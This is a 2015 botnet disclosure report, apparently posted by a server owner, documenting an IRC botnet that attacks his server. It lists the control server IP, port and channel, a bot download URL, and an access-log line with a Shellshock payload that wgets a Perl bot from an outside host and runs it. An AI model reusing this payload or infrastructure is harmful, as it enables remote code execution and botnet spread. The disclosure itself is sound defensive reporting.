irc botnet disclosure 16/JAN/2015 - part 3

http://pastebin.com/SPMkyZ4w - saga continues.. (:
 _____________________________________
[```` BOTNET INVESTIGATION REPORT ````]
 `````````````````````````````````````

 Date: January 16, 2015
 Botnet type: IRC Bots/Malware
 Botnet control server IP: 64.32.12.57   (Sharktech.net)
 Protocol: IRC
 Port: 80   ( /connect 64.32.12.57 80    -j #new )
 Hacked hosts: >500
 Previous report of the same botnet: http://pastebin.com/DabxDiwm , http://pastebin.com/SPMkyZ4w
 Bot url: http://74.208.166.12/bot.txt  (mirror: http://pastebin.com/Zbkke58A)
             (u17173405.onlinehome-server.com Numerical: 74.208.166.12)

 Access log:
217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"


We can clearly see that this is a shell-shock exploitation try and the source code is here:
 http://74.208.166.12/bot.txt  ( MIRROR:  http://pastebin.com/Zbkke58A )

From the source code we can clearly see that this is an IRC bot that connects to a following server:
$servidor='64.32.12.57' unless $servidor;
my $porta='80';
my @canais=("#new");
my @adms=("X","Y");
my @auth=("*!*@evil");

Hey, whoever you are, it's a third time I reporting you to the public, maybe you'll stop attacking my server? I see you are enjoying everyone using your botnet :-) Good luck.